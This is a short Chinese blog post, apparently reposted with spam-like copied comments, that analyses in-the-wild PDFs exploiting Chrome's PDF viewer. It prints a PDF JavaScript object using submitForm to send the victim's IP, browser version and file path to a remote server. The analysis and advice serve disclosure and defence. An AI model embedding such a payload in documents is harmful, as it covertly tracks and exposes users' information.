Chrome浏览器打开PDF文件信息泄露漏洞简析
Chrome浏览器打开PDF文件信息泄露漏洞简析
edgespot在2月26他们的博客上报告了这个问题,今天我了看了下,简单记录一下背景自2018年12月下旬以来,EdgeSpot已经在野外检测到多个PDF样本,这些样本利用谷歌浏览器未修补的漏洞。使用Google Chrome作为本地PDF查看器时,假如成功利用漏洞,可以跟踪用户并收集一些用户信息。 简析我下载了一些样本,查看了下,是在pdf
Chrome浏览器打开PDF文件信息泄露漏洞简析
edgespot在2月26他们的博客上报告了这个问题,今天我了看了下,简单记录一下
背景
自2018年12月下旬以来,EdgeSpot已经在野外检测到多个PDF样本,这些样本利用谷歌浏览器未修补的漏洞。使用Google Chrome作为本地PDF查看器时,假如成功利用漏洞,可以跟踪用户并收集一些用户信息。
简析
我下载了一些样本,查看了下,是在pdf中嵌入了JavaScript,JavaScript有些是没有加密的,有些是zip的压缩算法加密(即FlateDecode),可以使用zlib库解密
原理很简单,就是利用this.submitForm()这个PDF Javascript API,将发送一个POST请求,请求正文包含一个FDF格式的文件,其中里面泄露用户的路径
关键js代码如下(下面贴一个简单的js):
代码语言:javascript代码运行次数:0运行复制9 0 obj
<<
/S/JavaScript/JS(
if\(this.submitForm\){
this.submitForm\(''\);
app.alert\("Script executed"\);
}
)
/ext<</F<</F 10 0 R/FS/URL>>/S/SubmitForm>>
>>
endobj我将上面的url改为我自己的服务器地址192.168.XXX.XXX,下面是我抓包的结果
那么攻击者可以得到的信息有
1、受害者公网ip 2、使用的浏览器的版本 、pdf所在的路径
其他样本所含的js
美化后
总结
试了一下,这个不止是chrome浏览器受影响,60浏览器也受影响,那么应该是使用chromium内核的都受影响了。
建议:打开pdf用其他pdf查看器,不建议打开来路不明的pdf,保险一点的可以使用网盘等在线的查看器查看
reference
.html
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。 原始发表:2019-0-01,如有侵权请联系 cloudcommunity@tencent 删除漏洞chromepdf加密浏览器#感谢您对电脑配置推荐网 - 最新i3 i5 i7组装电脑配置单推荐报价格的认可,转载请说明来源于"电脑配置推荐网 - 最新i3 i5 i7组装电脑配置单推荐报价格
上传时间: 2025-07-24 13:24:35
推荐阅读
| 留言与评论(共有 8 条评论) |
| 本站网友 温州二手房网 | 19分钟前 发表 |
| 建议:打开pdf用其他pdf查看器 | |
| 本站网友 扶绥论坛 | 16分钟前 发表 |
| Chrome浏览器打开PDF文件信息泄露漏洞简析 edgespot在2月26他们的博客上报告了这个问题 | |
| 本站网友 假体隆鼻的价格 | 17分钟前 发表 |
| 可以跟踪用户并收集一些用户信息 | |
| 本站网友 韩国高丽参的功效 | 5分钟前 发表 |
| 不建议打开来路不明的pdf | |
| 本站网友 肝病药 | 27分钟前 发表 |
| 建议:打开pdf用其他pdf查看器 | |
| 本站网友 珠海九龙医院 | 9分钟前 发表 |
| 原始发表:2019-0-01 | |
| 本站网友 天府花城 | 21分钟前 发表 |
| 那么应该是使用chromium内核的都受影响了 | |